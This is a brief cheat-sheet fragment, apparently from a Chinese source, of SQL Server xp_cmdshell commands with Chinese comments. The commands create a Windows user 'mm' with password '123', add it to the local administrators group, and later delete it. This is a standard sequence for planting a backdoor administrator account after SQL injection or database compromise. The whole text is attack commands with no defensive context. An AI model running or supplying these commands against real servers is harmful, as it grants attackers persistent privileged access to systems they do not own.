exec xp_cmdshell 'net user mm 123 /add' --添加一用户exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加exec xp_cmdshell 'net user mm /delete' --删除一用户